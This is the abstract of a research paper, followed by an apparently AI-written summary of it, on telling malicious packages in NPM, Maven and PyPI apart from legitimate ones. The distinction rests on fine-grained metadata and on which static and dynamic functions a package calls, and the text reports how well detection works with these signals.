A Large-scale Fine-grained Analysis of Packages in Open-Source Software Ecosystems

Xiaoyan Zhou,Feiran Liang,Zhaojie Xie,Yang Lan,Wenjia Niu,Jiqiang Liu,Haining Wang,Qiang Li
2024-04-17
Abstract:Package managers such as NPM, Maven, and PyPI play a pivotal role in open-source software (OSS) ecosystems, streamlining the distribution and management of various freely available packages. The fine-grained details within software packages can unveil potential risks within existing OSS ecosystems, offering valuable insights for detecting malicious packages. In this study, we undertake a large-scale empirical analysis focusing on fine-grained information (FGI): the metadata, static, and dynamic functions. Specifically, we investigate the FGI usage across a diverse set of 50,000+ legitimate and 1,000+ malicious packages. Based on this diverse data collection, we conducted a comparative analysis between legitimate and malicious packages. Our findings reveal that (1) malicious packages have less metadata content and utilize fewer static and dynamic functions than legitimate ones; (2) malicious packages demonstrate a higher tendency to invoke HTTP/URL functions as opposed to other application services, such as FTP or SMTP; (3) FGI serves as a distinguishable indicator between legitimate and malicious packages; and (4) one dimension in FGI has sufficient distinguishable capability to detect malicious packages, and combining all dimensions in FGI cannot significantly improve overall performance.
Software Engineering,Cryptography and Security
What problem does this paper attempt to address?
The main problem that this paper attempts to solve is the security threat of malware packages in the open - source software (OSS) ecosystem. Specifically, the authors focus on distinguishing legitimate packages from malware packages through fine - grained information (FGI), thus providing an effective method to detect malware packages. The following are the specific objectives and methods of this research: ### Research Background and Problem With the wide application of the open - source software ecosystem, package managers such as NPM, Maven, and PyPI have played a crucial role in distributing and managing various freely available packages. However, these reused packages also bring security risks because attackers may inject malicious code or tamper with originally legitimate packages to attack the system. For example, in 2018, attackers exploited the development permissions of the 'eslint - scope' package to embed malicious executables, causing a large number of systems to be affected. ### Research Objectives This paper aims to explore the application of fine - grained information (FGI) in detecting malware packages through large - scale empirical analysis of more than 50,000 legitimate packages and more than 1,000 malware packages. Specifically, the research mainly focuses on the following aspects: - **Metadata**: including the package name, version, author, dependencies, etc. - **Static functions**: methods directly integrated into the source code, depending on the programming language used. - **Dynamic functions**: flexibility provided during the installation or running phase. ### Research Questions To achieve the above objectives, the research proposes the following research questions (RQs): 1. **RQ1**: How do legitimate and malware packages differ at the metadata level? 2. **RQ1**: How do legitimate and malware packages differ at the static function level? 3. **RQ3**: How do legitimate and malware packages differ at the dynamic function level? 4. **RQ4**: What is the application effect of fine - grained information in malware detection? ### Main Findings Through comparative analysis, the authors draw the following conclusions: 1. **Metadata level**: Malware packages usually have shorter descriptions, fewer authors, lack of URL links, and fewer dependencies. 2. **Static function level**: The types and frequencies of static functions called by malware packages are significantly different from those of legitimate packages, especially in network - related and file - operation aspects. 3. **Dynamic function level**: Malware packages are more likely to call HTTP/URL functions rather than other application services (such as FTP or SMTP). 4. **Detection effect**: The detection model based on fine - grained information can achieve an accuracy rate of 97.5% and a recall rate of 94.4%, indicating that FGI can be used as a reliable distinguishing indicator. ### Summary This research reveals significant differences between legitimate and malware packages through in - depth analysis of fine - grained information and proposes an effective method for detecting malware packages. This result helps to improve the security of the open - source software ecosystem and provides an important reference for developers. If you have more specific questions or need further understanding of certain details, please feel free to let us know!